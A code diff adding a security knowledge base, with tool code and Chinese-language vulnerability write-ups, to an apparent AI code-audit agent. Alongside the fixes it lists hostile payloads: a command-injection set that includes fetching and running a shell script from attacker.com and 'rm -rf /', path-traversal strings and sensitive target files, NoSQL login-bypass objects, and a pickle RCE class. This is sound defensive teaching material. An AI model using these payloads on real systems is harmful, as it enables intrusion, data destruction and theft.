        description="按类别过滤: vulnerability, best_practice, remediation"
    )
|
||||
|
||||
|
||||
class ListKnowledgeModulesTool(AgentTool):
    """
    Agent tool that lists the knowledge modules available in the knowledge
    base (vulnerability types and frameworks).
    """

    @property
    def name(self) -> str:
        return "list_knowledge_modules"

    @property
    def description(self) -> str:
        return "列出所有可用的安全知识模块,包括漏洞类型、最佳实践等"

    @property
    def args_schema(self) -> Type[BaseModel]:
        return ListKnowledgeModulesInput

    async def _execute(self, category: Optional[str] = None) -> ToolResult:
        """
        List the available knowledge modules.

        Args:
            category: Optional filter. ``"vulnerability"`` lists only
                vulnerability types and ``"framework"`` only frameworks.
                ``None`` or any other value lists both, because the
                knowledge base exposes no per-module listing for other
                categories.

        Returns:
            A successful ``ToolResult`` whose metadata carries ``modules``
            (vulnerability type names, empty when filtered out),
            ``frameworks`` and the normalised ``category``; a failed
            ``ToolResult`` if listing raised.
        """
        try:
            requested = category.strip().lower() if category else None
            show_vulnerabilities = requested != "framework"
            show_frameworks = requested != "vulnerability"

            modules = (
                security_knowledge_rag.get_all_vulnerability_types()
                if show_vulnerabilities else []
            )
            frameworks = (
                security_knowledge_rag.get_all_frameworks()
                if show_frameworks else []
            )

            sections = []
            if show_vulnerabilities:
                sections.append(
                    "## 漏洞类型\n" + "".join(f"- {module}\n" for module in modules)
                )
            if show_frameworks:
                sections.append(
                    "## 框架\n" + "".join(f"- {framework}\n" for framework in frameworks)
                )

            output = "可用的安全知识模块:\n\n" + "\n".join(sections)

            return ToolResult(
                success=True,
                data=output,
                metadata={
                    "modules": modules,
                    "frameworks": frameworks,
                    "category": requested,
                },
            )

        except Exception as e:
            # Keep the traceback in the log; the agent only gets the message.
            logger.error("List knowledge modules failed: %s", e, exc_info=True)
            return ToolResult(
                success=False,
                error=f"列出知识模块失败: {str(e)}",
            )
|
||||
|
|
@ -0,0 +1,62 @@
|
|||
"""
|
||||
漏洞类型知识模块
|
||||
|
||||
包含各种漏洞类型的专业知识
|
||||
"""
|
||||
|
||||
from .injection import SQL_INJECTION, NOSQL_INJECTION, COMMAND_INJECTION, CODE_INJECTION
|
||||
from .xss import XSS_REFLECTED, XSS_STORED, XSS_DOM
|
||||
from .auth import AUTH_BYPASS, IDOR, BROKEN_ACCESS_CONTROL
|
||||
from .crypto import WEAK_CRYPTO, HARDCODED_SECRETS
|
||||
from .ssrf import SSRF
|
||||
from .deserialization import INSECURE_DESERIALIZATION
|
||||
from .path_traversal import PATH_TRAVERSAL
|
||||
from .xxe import XXE
|
||||
from .race_condition import RACE_CONDITION
|
||||
|
||||
# All vulnerability knowledge documents, grouped by family.
# NOTE(review): order is presumably significant to consumers that return the
# first matching document — confirm before reordering.
ALL_VULNERABILITY_DOCS = [
    # Injection
    SQL_INJECTION,
    NOSQL_INJECTION,
    COMMAND_INJECTION,
    CODE_INJECTION,
    # XSS
    XSS_REFLECTED,
    XSS_STORED,
    XSS_DOM,
    # Authentication / authorization
    AUTH_BYPASS,
    IDOR,
    BROKEN_ACCESS_CONTROL,
    # Cryptography
    WEAK_CRYPTO,
    HARDCODED_SECRETS,
    # Other
    SSRF,
    INSECURE_DESERIALIZATION,
    PATH_TRAVERSAL,
    XXE,
    RACE_CONDITION,
]
|
||||
|
||||
# Public names of this package: the aggregate list plus every individual
# vulnerability document imported above.
__all__ = [
    "ALL_VULNERABILITY_DOCS",
    "SQL_INJECTION",
    "NOSQL_INJECTION",
    "COMMAND_INJECTION",
    "CODE_INJECTION",
    "XSS_REFLECTED",
    "XSS_STORED",
    "XSS_DOM",
    "AUTH_BYPASS",
    "IDOR",
    "BROKEN_ACCESS_CONTROL",
    "WEAK_CRYPTO",
    "HARDCODED_SECRETS",
    "SSRF",
    "INSECURE_DESERIALIZATION",
    "PATH_TRAVERSAL",
    "XXE",
    "RACE_CONDITION",
]
|
||||
|
|
@ -0,0 +1,231 @@
|
|||
"""
|
||||
认证和授权漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
# Knowledge-base entry for authentication bypass (CWE-287 / CWE-306).
# `content` is markdown: dangerous patterns, detection hints, safe practices
# and a fix example. Nested lines in the embedded samples are indented so the
# samples are valid Python.
AUTH_BYPASS = KnowledgeDocument(
    id="vuln_auth_bypass",
    title="Authentication Bypass",
    category=KnowledgeCategory.VULNERABILITY,
    tags=["authentication", "bypass", "login", "session", "jwt"],
    severity="critical",
    cwe_ids=["CWE-287", "CWE-306"],
    owasp_ids=["A07:2021"],
    content="""
认证绕过允许攻击者在不提供有效凭证的情况下访问系统。

## 危险模式

### JWT验证缺失
```python
# 危险 - 不验证签名
jwt.decode(token, options={"verify_signature": False})

# 危险 - 允许none算法
jwt.decode(token, algorithms=["HS256", "none"])

# 危险 - 弱密钥
jwt.encode(payload, "secret", algorithm="HS256")
```

### 会话管理问题
```python
# 危险 - 可预测的会话ID
session_id = str(user_id)
session_id = hashlib.md5(username.encode()).hexdigest()

# 危险 - 会话固定
session['user'] = user # 登录后未重新生成session
```

### 认证逻辑缺陷
```python
# 危险 - 逻辑绕过
if user.is_admin or request.args.get('admin') == 'true':
    return admin_panel()

# 危险 - 默认凭证
if username == "admin" and password == "admin":
    return login_success()
```

## 检测要点
1. JWT的算法和签名验证
2. 会话ID的随机性
3. 登录后是否重新生成会话
4. 认证逻辑的完整性
5. 默认/硬编码凭证

## 安全实践
1. 强制验证JWT签名
2. 使用强随机会话ID
3. 登录后重新生成会话
4. 多因素认证
5. 账户锁定机制

## 修复示例
```python
# 安全 - 正确验证JWT
jwt.decode(token, SECRET_KEY, algorithms=["HS256"])

# 安全 - 登录后重新生成会话
session.regenerate()
session['user_id'] = user.id
```
""",
)
|
||||
|
||||
|
||||
# Knowledge-base entry for Insecure Direct Object Reference (CWE-639).
# `content` is markdown: dangerous patterns, attack techniques, detection
# hints, safe practices and a fix example. Function bodies in the embedded
# samples are indented so the samples are valid Python.
IDOR = KnowledgeDocument(
    id="vuln_idor",
    title="Insecure Direct Object Reference (IDOR)",
    category=KnowledgeCategory.VULNERABILITY,
    tags=["idor", "authorization", "access-control", "bola"],
    severity="high",
    cwe_ids=["CWE-639"],
    owasp_ids=["A01:2021"],
    content="""
IDOR(不安全的直接对象引用)允许攻击者通过修改参数访问其他用户的数据。

## 危险模式

### 直接使用用户输入的ID
```python
# 危险 - 无权限检查
@app.route('/api/user/<user_id>')
def get_user(user_id):
    return User.query.get(user_id).to_dict()

# 危险 - 文件访问
@app.route('/download/<file_id>')
def download(file_id):
    return send_file(f"/uploads/{file_id}")
```

### API端点
```python
# 危险
GET /api/orders/12345 # 可以改成其他订单ID
GET /api/users/100/profile
DELETE /api/documents/999
```

## 攻击方式
1. 递增/递减ID值
2. 使用其他用户的ID
3. 批量枚举
4. 参数污染

## 检测要点
1. 检查所有使用ID参数的端点
2. 验证是否有权限检查
3. 检查是否验证资源所有权
4. 关注批量操作接口

## 安全实践
1. 始终验证资源所有权
2. 使用UUID代替自增ID
3. 实现基于角色的访问控制
4. 记录访问日志

## 修复示例
```python
# 安全 - 验证所有权
@app.route('/api/user/<user_id>')
@login_required
def get_user(user_id):
    user = User.query.get(user_id)
    if user.id != current_user.id and not current_user.is_admin:
        abort(403)
    return user.to_dict()

# 安全 - 使用当前用户上下文
@app.route('/api/profile')
@login_required
def get_profile():
    return current_user.to_dict()
```
""",
)
|
||||
|
||||
|
||||
# Knowledge-base entry for broken access control (CWE-284 / CWE-285).
# `content` is markdown: dangerous patterns, detection hints, safe practices
# and a fix example. Function and loop bodies in the embedded samples are
# indented so the samples are valid Python.
BROKEN_ACCESS_CONTROL = KnowledgeDocument(
    id="vuln_broken_access_control",
    title="Broken Access Control",
    category=KnowledgeCategory.VULNERABILITY,
    tags=["access-control", "authorization", "privilege", "rbac"],
    severity="critical",
    cwe_ids=["CWE-284", "CWE-285"],
    owasp_ids=["A01:2021"],
    content="""
访问控制失效允许用户执行超出其权限的操作。

## 危险模式

### 缺少权限检查
```python
# 危险 - 管理功能无权限验证
@app.route('/admin/delete_user/<user_id>')
def delete_user(user_id):
    User.query.get(user_id).delete()
    return "Deleted"

# 危险 - 仅前端隐藏
# 前端隐藏了按钮,但API无保护
```

### 权限提升
```python
# 危险 - 可修改角色
@app.route('/api/user/update', methods=['POST'])
def update_user():
    user = current_user
    user.role = request.json.get('role') # 用户可自己提升权限
    db.commit()
```

### 水平越权
```python
# 危险 - 可访问其他用户数据
@app.route('/api/orders')
def get_orders():
    user_id = request.args.get('user_id') # 可指定任意用户
    return Order.query.filter_by(user_id=user_id).all()
```

## 检测要点
1. 所有敏感操作是否有权限检查
2. 权限检查是否在服务端
3. 是否可以修改自己的权限
4. 是否可以访问其他用户的资源

## 安全实践
1. 默认拒绝所有访问
2. 服务端强制权限检查
3. 使用RBAC/ABAC
4. 记录所有访问尝试
5. 定期审计权限配置

## 修复示例
```python
# 安全 - 装饰器检查权限
@app.route('/admin/delete_user/<user_id>')
@login_required
@admin_required
def delete_user(user_id):
    User.query.get(user_id).delete()
    return "Deleted"

# 安全 - 白名单可修改字段
ALLOWED_FIELDS = ['name', 'email', 'avatar']
@app.route('/api/user/update', methods=['POST'])
@login_required
def update_user():
    for field in request.json:
        if field in ALLOWED_FIELDS:
            setattr(current_user, field, request.json[field])
```
""",
)
|
||||
|
|
@ -0,0 +1,163 @@
|
|||
"""
|
||||
加密相关漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
# Knowledge-base entry for weak cryptography (CWE-327 / CWE-328).
# `content` is markdown: weak hashes, weak ciphers/modes, insecure randomness,
# detection keywords, safe practices and a fix example.
WEAK_CRYPTO = KnowledgeDocument(
    id="vuln_weak_crypto",
    title="Weak Cryptography",
    category=KnowledgeCategory.VULNERABILITY,
    tags=["crypto", "encryption", "hash", "md5", "sha1"],
    severity="medium",
    cwe_ids=["CWE-327", "CWE-328"],
    owasp_ids=["A02:2021"],
    content="""
使用弱加密算法或不当的加密实现可能导致数据泄露。

## 危险模式

### 弱哈希算法
```python
# 危险 - MD5/SHA1用于密码
password_hash = hashlib.md5(password.encode()).hexdigest()
password_hash = hashlib.sha1(password.encode()).hexdigest()

# 危险 - 无盐哈希
hash = hashlib.sha256(password.encode()).hexdigest()
```

### 弱加密算法
```python
# 危险 - DES/3DES
from Crypto.Cipher import DES
cipher = DES.new(key, DES.MODE_ECB)

# 危险 - ECB模式
cipher = AES.new(key, AES.MODE_ECB)

# 危险 - 弱密钥
key = "12345678" # 短密钥
key = password.encode()[:16] # 从密码派生
```

### 不安全的随机数
```python
# 危险 - 使用random模块
import random
token = ''.join(random.choices(string.ascii_letters, k=32))
session_id = random.randint(0, 999999)
```

## 检测关键词
- md5, sha1, des, 3des, rc4
- MODE_ECB
- random.random, random.randint
- 硬编码的密钥/IV

## 安全实践
1. 密码使用bcrypt/argon2/scrypt
2. 加密使用AES-256-GCM
3. 使用secrets模块生成随机数
4. 使用KDF派生密钥

## 修复示例
```python
# 安全 - 密码哈希
import bcrypt
password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt())

# 安全 - 加密
from cryptography.fernet import Fernet
key = Fernet.generate_key()
cipher = Fernet(key)

# 安全 - 随机数
import secrets
token = secrets.token_urlsafe(32)
```
""",
)
|
||||
|
||||
|
||||
# Knowledge-base entry for hardcoded secrets (CWE-798 / CWE-259).
# `content` is markdown: hardcoded passwords, API keys, connection strings and
# config-file secrets, detection regexes, safe practices and a fix example.
# YAML samples are indented so they are valid YAML, and the YAML fix sample
# has its own ```yaml fence instead of sitting inside the Python one.
# The string is not raw: `\\s` and `\"` below are Python escapes for `\s`/`"`.
HARDCODED_SECRETS = KnowledgeDocument(
    id="vuln_hardcoded_secrets",
    title="Hardcoded Secrets",
    category=KnowledgeCategory.VULNERABILITY,
    tags=["secrets", "password", "credentials", "api-key", "token", "leak"],
    severity="high",
    cwe_ids=["CWE-798", "CWE-259"],
    owasp_ids=["A07:2021"],
    content="""
硬编码的凭证可能被攻击者从源代码、日志或配置文件中提取。

## 危险模式

### 硬编码密码
```python
# 危险
password = "admin123"
db_password = "P@ssw0rd!"
root_password = "toor"
```

### 硬编码API密钥
```python
# 危险
api_key = "sk-1234567890abcdef"
aws_access_key = "AKIAIOSFODNN7EXAMPLE"
stripe_key = "sk_live_xxxxx"
github_token = "ghp_xxxxxxxxxxxx"
```

### 硬编码连接字符串
```python
# 危险
connection_string = "mysql://root:password@localhost/db"
redis_url = "redis://:password@localhost:6379"
mongodb_uri = "mongodb://admin:pass@localhost:27017"
```

### 配置文件中的密钥
```yaml
# 危险 - config.yaml
database:
  password: "secret123"
jwt:
  secret: "my-jwt-secret"
```

## 检测正则
```regex
# API Keys
(api[_-]?key|apikey)['\"]?\\s*[:=]\\s*['\"][a-zA-Z0-9]{16,}['\"]
# AWS Keys
AKIA[0-9A-Z]{16}
# Private Keys
-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----
# JWT Secrets
(jwt[_-]?secret|secret[_-]?key)['\"]?\\s*[:=]\\s*['\"][^'\"]+['\"]
```

## 安全实践
1. 使用环境变量
2. 使用密钥管理服务(AWS Secrets Manager, HashiCorp Vault)
3. 使用.gitignore排除敏感文件
4. 使用git-secrets防止提交
5. 定期轮换密钥

## 修复示例
```python
# 安全 - 环境变量
import os
password = os.environ.get("DB_PASSWORD")
api_key = os.environ.get("API_KEY")
```

```yaml
# 安全 - 配置文件引用环境变量
# config.yaml
database:
  password: ${DB_PASSWORD}
```
""",
)
|
||||
|
|
@ -0,0 +1,119 @@
|
|||
"""
|
||||
反序列化漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
# Knowledge-base entry for insecure deserialization (CWE-502).
# `content` is markdown: dangerous patterns per language, an attack
# illustration, detection hints, safe practices and a fix example. Class and
# function bodies in the embedded samples are indented so they are valid
# Python.
INSECURE_DESERIALIZATION = KnowledgeDocument(
    id="vuln_deserialization",
    title="Insecure Deserialization",
    category=KnowledgeCategory.VULNERABILITY,
    tags=["deserialization", "pickle", "yaml", "json", "object", "rce"],
    severity="critical",
    cwe_ids=["CWE-502"],
    owasp_ids=["A08:2021"],
    content="""
不安全的反序列化可能导致远程代码执行、拒绝服务或权限提升。

## 危险模式

### Python Pickle
```python
# 危险 - 反序列化不可信数据
import pickle
data = pickle.loads(user_data)
data = pickle.load(open(user_file, 'rb'))

# 危险 - 通过网络接收
data = pickle.loads(request.data)
```

### Python YAML
```python
# 危险 - 不安全的yaml.load
import yaml
data = yaml.load(user_input) # 不带Loader参数
data = yaml.load(user_input, Loader=yaml.Loader) # 不安全的Loader
```

### Python Marshal
```python
# 危险
import marshal
code = marshal.loads(user_data)
```

### Java
```java
// 危险 - ObjectInputStream
ObjectInputStream ois = new ObjectInputStream(userInput);
Object obj = ois.readObject();

// 危险 - XMLDecoder
XMLDecoder decoder = new XMLDecoder(userInput);
Object obj = decoder.readObject();
```

### PHP
```php
// 危险
$data = unserialize($_POST['data']);
```

### Node.js
```javascript
// 危险 - node-serialize
var serialize = require('node-serialize');
var obj = serialize.unserialize(userInput);
```

## 攻击原理
```python
# Pickle RCE示例
import pickle
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())
# 反序列化时执行os.system('id')
```

## 检测要点
1. 搜索pickle.loads, yaml.load, unserialize
2. 检查数据来源是否可信
3. 检查是否有签名验证
4. 关注网络接收的序列化数据

## 安全实践
1. 避免反序列化不可信数据
2. 使用安全的序列化格式(JSON)
3. 使用yaml.safe_load()
4. 实现完整性检查(HMAC签名)
5. 使用白名单限制可反序列化的类

## 修复示例
```python
# 安全 - 使用JSON
import json
data = json.loads(user_input)

# 安全 - 使用safe_load
import yaml
data = yaml.safe_load(user_input)

# 安全 - 签名验证
import hmac
import pickle

def safe_loads(data, signature, key):
    expected_sig = hmac.new(key, data, 'sha256').hexdigest()
    if not hmac.compare_digest(signature, expected_sig):
        raise ValueError("Invalid signature")
    return pickle.loads(data)
```
""",
)
|
||||
|
|
@ -0,0 +1,273 @@
|
|||
"""
|
||||
注入类漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
# Knowledge-base entry for SQL injection (CWE-89).
# `content` is markdown: dangerous patterns per language, detection keywords,
# safe practices, a fix example and manual verification steps.
SQL_INJECTION = KnowledgeDocument(
    id="vuln_sql_injection",
    title="SQL Injection",
    category=KnowledgeCategory.VULNERABILITY,
    tags=["sql", "injection", "database", "input-validation", "sqli"],
    severity="critical",
    cwe_ids=["CWE-89"],
    owasp_ids=["A03:2021"],
    content="""
SQL注入是一种代码注入技术,攻击者通过在应用程序查询中插入恶意SQL代码来操纵数据库。

## 危险模式

### Python
```python
# 危险 - 字符串拼接
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(f"SELECT * FROM users WHERE name = '{name}'")
query = "SELECT * FROM users WHERE id = %s" % user_id

# 危险 - ORM原始查询
User.objects.raw(f"SELECT * FROM users WHERE name = '{name}'")
db.execute(text(f"SELECT * FROM users WHERE id = {user_id}"))
```

### JavaScript/Node.js
```javascript
// 危险
const query = `SELECT * FROM users WHERE id = ${userId}`;
connection.query("SELECT * FROM users WHERE name = '" + name + "'");
```

### Java
```java
// 危险
String query = "SELECT * FROM users WHERE id = " + userId;
Statement stmt = conn.createStatement();
stmt.executeQuery(query);
```

## 检测关键词
- execute, query, raw, cursor
- SELECT, INSERT, UPDATE, DELETE
- 字符串拼接 (+, f-string, format, %)
- WHERE, AND, OR 后跟变量

## 安全实践
1. 使用参数化查询/预编译语句
2. 使用ORM框架的安全API
3. 输入验证和类型检查
4. 最小权限原则
5. 使用存储过程

## 修复示例
```python
# 安全 - 参数化查询
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))

# 安全 - ORM
User.objects.filter(id=user_id)

# 安全 - SQLAlchemy
db.query(User).filter(User.id == user_id)
```

## 验证方法
1. 尝试单引号 ' 触发语法错误
2. 使用 OR 1=1 测试布尔注入
3. 使用 SLEEP() 测试时间盲注
4. 检查错误信息是否泄露数据库信息
""",
)
|
||||
|
||||
|
||||
# Knowledge-base entry for NoSQL injection (CWE-943).
# `content` is markdown: dangerous MongoDB patterns, example payloads, safe
# practices and a fix example. The `if` body in the fix sample is indented so
# the sample is valid Python.
NOSQL_INJECTION = KnowledgeDocument(
    id="vuln_nosql_injection",
    title="NoSQL Injection",
    category=KnowledgeCategory.VULNERABILITY,
    tags=["nosql", "mongodb", "injection", "database"],
    severity="high",
    cwe_ids=["CWE-943"],
    owasp_ids=["A03:2021"],
    content="""
NoSQL注入针对MongoDB等NoSQL数据库,通过操纵查询对象来绕过认证或提取数据。

## 危险模式

### MongoDB (Python)
```python
# 危险 - 直接使用用户输入构建查询
db.users.find({"username": username, "password": password})
# 攻击者可传入 {"$ne": ""} 绕过认证

# 危险 - $where操作符
db.users.find({"$where": f"this.name == '{name}'"})
```

### MongoDB (Node.js)
```javascript
// 危险
db.collection('users').find({username: req.body.username});
// 攻击者可传入 {$gt: ""} 或 {$ne: null}
```

## 攻击载荷示例
```json
// 绕过认证
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}

// 正则注入
{"username": {"$regex": "^admin"}}
```

## 安全实践
1. 验证输入类型(确保是字符串而非对象)
2. 使用白名单验证
3. 避免使用$where操作符
4. 使用mongoose等ODM的类型验证

## 修复示例
```python
# 安全 - 类型验证
if not isinstance(username, str):
    raise ValueError("Invalid username type")
db.users.find({"username": str(username)})
```
""",
)
|
||||
|
||||
|
||||
# Knowledge-base entry for OS command injection (CWE-78).
# `content` is markdown: dangerous patterns per language, example payloads,
# safe practices and a fix example.
COMMAND_INJECTION = KnowledgeDocument(
    id="vuln_command_injection",
    title="Command Injection",
    category=KnowledgeCategory.VULNERABILITY,
    tags=["command", "injection", "shell", "os", "system", "rce"],
    severity="critical",
    cwe_ids=["CWE-78"],
    owasp_ids=["A03:2021"],
    content="""
命令注入允许攻击者在主机操作系统上执行任意命令,可能导致完全系统控制。

## 危险模式

### Python
```python
# 危险
os.system("ping " + user_input)
os.popen("ls " + directory)
subprocess.call("ls " + directory, shell=True)
subprocess.Popen(cmd, shell=True)
commands.getoutput("cat " + filename)

# 危险 - eval/exec
eval(user_input)
exec(user_code)
```

### Node.js
```javascript
// 危险
exec("ls " + userInput);
execSync(`cat ${filename}`);
spawn("sh", ["-c", userCommand]);
```

### PHP
```php
// 危险
system("ping " . $ip);
exec("cat " . $file);
shell_exec($cmd);
passthru($command);
```

## 攻击载荷
```bash
; ls -la
| cat /etc/passwd
`whoami`
$(id)
&& rm -rf /
|| curl attacker.com/shell.sh | sh
```

## 安全实践
1. 避免使用shell=True
2. 使用参数列表而非字符串
3. 输入验证和白名单
4. 使用安全的替代API
5. 沙箱执行

## 修复示例
```python
# 安全 - 参数列表
subprocess.run(["ping", "-c", "4", validated_host], shell=False)

# 安全 - shlex转义
import shlex
subprocess.run(shlex.split(f"ping -c 4 {shlex.quote(host)}"))
```
""",
)
|
||||
|
||||
|
||||
# Knowledge-base entry for code injection (CWE-94).
# `content` is markdown: dangerous dynamic-evaluation patterns per language,
# safe practices and a fix example. The PHP preg_replace sample uses a
# complete `/.../e` pattern, since the danger comes from the `e` modifier.
CODE_INJECTION = KnowledgeDocument(
    id="vuln_code_injection",
    title="Code Injection",
    category=KnowledgeCategory.VULNERABILITY,
    tags=["code", "injection", "eval", "exec", "rce"],
    severity="critical",
    cwe_ids=["CWE-94"],
    owasp_ids=["A03:2021"],
    content="""
代码注入允许攻击者注入并执行任意代码,通常通过eval()等动态执行函数。

## 危险模式

### Python
```python
# 危险
eval(user_input)
exec(user_code)
compile(user_code, '<string>', 'exec')

# 危险 - 模板注入
template = Template(user_input)
render_template_string(user_input)
```

### JavaScript
```javascript
// 危险
eval(userInput);
new Function(userCode)();
setTimeout(userCode, 1000);
setInterval(userCode, 1000);
```

### PHP
```php
// 危险
eval($code);
assert($code);
preg_replace('/.*/e', $code, $input); // /e 修饰符, PHP < 7
create_function('', $code);
```

## 安全实践
1. 永远不要eval用户输入
2. 使用AST解析代替eval
3. 使用沙箱环境
4. 白名单允许的操作

## 修复示例
```python
# 安全 - 使用ast.literal_eval处理数据
import ast
data = ast.literal_eval(user_input) # 只允许字面量

# 安全 - 使用json解析
import json
data = json.loads(user_input)
```
""",
)
|
||||
|
|
@ -0,0 +1,129 @@
|
|||
"""
|
||||
路径遍历漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
PATH_TRAVERSAL = KnowledgeDocument(
|
||||
id="vuln_path_traversal",
|
||||
title="Path Traversal",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["path", "traversal", "file", "directory", "lfi", "rfi"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-22", "CWE-23"],
|
||||
owasp_ids=["A01:2021"],
|
||||
content="""
|
||||
路径遍历允许攻击者访问应用程序根目录之外的文件,可能导致敏感信息泄露或代码执行。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 危险 - 直接拼接路径
|
||||
file_path = "/uploads/" + user_filename
|
||||
open(base_dir + request.args['file'])
|
||||
os.path.join(base_dir, user_input) # 仍然危险!
|
||||
|
||||
# 危险 - 文件下载
|
||||
@app.route('/download')
|
||||
def download():
|
||||
filename = request.args.get('file')
|
||||
return send_file(f'/files/{filename}')
|
||||
|
||||
# 危险 - 模板包含
|
||||
render_template(user_template)
|
||||
```
|
||||
|
||||
### Node.js
|
||||
```javascript
|
||||
// 危险
|
||||
const filePath = path.join(__dirname, req.query.file);
|
||||
fs.readFile('./uploads/' + filename);
|
||||
res.sendFile(req.params.path);
|
||||
```
|
||||
|
||||
### PHP
|
||||
```php
|
||||
// 危险
|
||||
include($_GET['page']);
|
||||
require($user_input);
|
||||
file_get_contents($filename);
|
||||
```
|
||||
|
||||
## 攻击载荷
|
||||
```
|
||||
../../../etc/passwd
|
||||
..\\..\\..\\windows\\system32\\config\\sam
|
||||
....//....//....//etc/passwd
|
||||
..%2f..%2f..%2fetc/passwd
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
|
||||
..%252f..%252f..%252fetc/passwd (双重编码)
|
||||
```
|
||||
|
||||
## 敏感文件目标
|
||||
```
|
||||
# Linux
|
||||
/etc/passwd
|
||||
/etc/shadow
|
||||
/etc/hosts
|
||||
/proc/self/environ
|
||||
/var/log/apache2/access.log
|
||||
|
||||
# Windows
|
||||
C:\\Windows\\System32\\config\\SAM
|
||||
C:\\Windows\\win.ini
|
||||
C:\\inetpub\\logs\\LogFiles
|
||||
|
||||
# 应用配置
|
||||
.env
|
||||
config.php
|
||||
settings.py
|
||||
application.yml
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 所有文件操作函数
|
||||
2. 用户输入是否用于构建路径
|
||||
3. 是否有路径规范化
|
||||
4. 是否验证最终路径在允许范围内
|
||||
|
||||
## 安全实践
|
||||
1. 验证和规范化路径
|
||||
2. 使用白名单
|
||||
3. 检查路径是否在允许目录内
|
||||
4. 使用安全的文件ID映射
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
import os
|
||||
|
||||
def safe_join(base_dir, user_path):
|
||||
# 规范化路径
|
||||
base_dir = os.path.realpath(base_dir)
full_path = os.path.realpath(os.path.join(base_dir, user_path))
|
||||
|
||||
# 验证路径在基础目录内
|
||||
if not full_path.startswith(base_dir + os.sep):
|
||||
raise ValueError("Path traversal detected")
|
||||
|
||||
return full_path
|
||||
|
||||
# 使用
|
||||
try:
|
||||
safe_path = safe_join('/uploads', user_filename)
|
||||
with open(safe_path) as f:
|
||||
content = f.read()
|
||||
except ValueError:
|
||||
abort(403)
|
||||
|
||||
# 更安全 - 使用文件ID映射
|
||||
@app.route('/download/<file_id>')
|
||||
def download(file_id):
|
||||
file_record = File.query.get(file_id)
|
||||
if file_record and file_record.user_id == current_user.id:
|
||||
return send_file(file_record.path)
|
||||
abort(404)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,134 @@
|
|||
"""
|
||||
竞态条件漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
RACE_CONDITION = KnowledgeDocument(
|
||||
id="vuln_race_condition",
|
||||
title="Race Condition",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["race", "condition", "toctou", "concurrency", "thread"],
|
||||
severity="medium",
|
||||
cwe_ids=["CWE-362", "CWE-367"],
|
||||
owasp_ids=["A04:2021"],
|
||||
content="""
|
||||
竞态条件发生在多个操作之间存在时间窗口,攻击者可以利用这个窗口改变系统状态。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### TOCTOU (Time-of-Check to Time-of-Use)
|
||||
```python
|
||||
# 危险 - 检查和使用之间有时间窗口
|
||||
if os.path.exists(filepath): # 检查
|
||||
# 攻击者可在此时替换文件
|
||||
with open(filepath) as f: # 使用
|
||||
data = f.read()
|
||||
|
||||
# 危险 - 余额检查
|
||||
if user.balance >= amount: # 检查
|
||||
# 并发请求可能同时通过检查
|
||||
user.balance -= amount # 使用
|
||||
db.commit()
|
||||
```
|
||||
|
||||
### 双重支付/提现
|
||||
```python
|
||||
# 危险 - 无锁的余额操作
|
||||
@app.route('/withdraw', methods=['POST'])
|
||||
def withdraw():
|
||||
amount = request.json['amount']
|
||||
if current_user.balance >= amount:
|
||||
current_user.balance -= amount
|
||||
db.commit()
|
||||
return transfer_money(amount)
|
||||
```
|
||||
|
||||
### 文件操作竞态
|
||||
```python
|
||||
# 危险 - 临时文件
|
||||
import tempfile
|
||||
path = tempfile.mktemp()  # 已弃用:只返回文件名,并不创建文件
# 攻击者可能在此时抢先创建同名文件或符号链接
open(path, 'w').close()
os.chmod(path, 0o644)
|
||||
```
|
||||
|
||||
### 会话竞态
|
||||
```python
|
||||
# 危险 - 会话更新
|
||||
session['cart_total'] = calculate_total()
|
||||
# 并发请求可能覆盖
|
||||
apply_discount(session['cart_total'])
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 检查-使用模式(if exists then use)
|
||||
2. 余额/库存等数值操作
|
||||
3. 文件创建和权限设置
|
||||
4. 无锁的数据库操作
|
||||
5. 会话状态修改
|
||||
|
||||
## 安全实践
|
||||
1. 使用数据库事务和锁
|
||||
2. 原子操作
|
||||
3. 使用文件锁
|
||||
4. 乐观锁/悲观锁
|
||||
5. 幂等性设计
|
||||
|
||||
## 修复示例
|
||||
|
||||
### 数据库锁
|
||||
```python
|
||||
# 安全 - 使用SELECT FOR UPDATE
|
||||
from sqlalchemy import select
|
||||
|
||||
@app.route('/withdraw', methods=['POST'])
|
||||
def withdraw():
|
||||
amount = request.json['amount']
|
||||
|
||||
with db.begin():
|
||||
# 行级锁
|
||||
user = db.execute(
|
||||
select(User).where(User.id == current_user.id).with_for_update()
|
||||
).scalar_one()
|
||||
|
||||
if user.balance >= amount:
|
||||
user.balance -= amount
|
||||
return transfer_money(amount)
|
||||
else:
|
||||
return "Insufficient balance", 400
|
||||
```
|
||||
|
||||
### 原子操作
|
||||
```python
|
||||
# 安全 - 原子更新
|
||||
from sqlalchemy import update
|
||||
|
||||
result = db.execute(
|
||||
update(User)
|
||||
.where(User.id == user_id)
|
||||
.where(User.balance >= amount) # 条件更新
|
||||
.values(balance=User.balance - amount)
|
||||
)
|
||||
if result.rowcount == 0:
|
||||
return "Insufficient balance", 400
|
||||
```
|
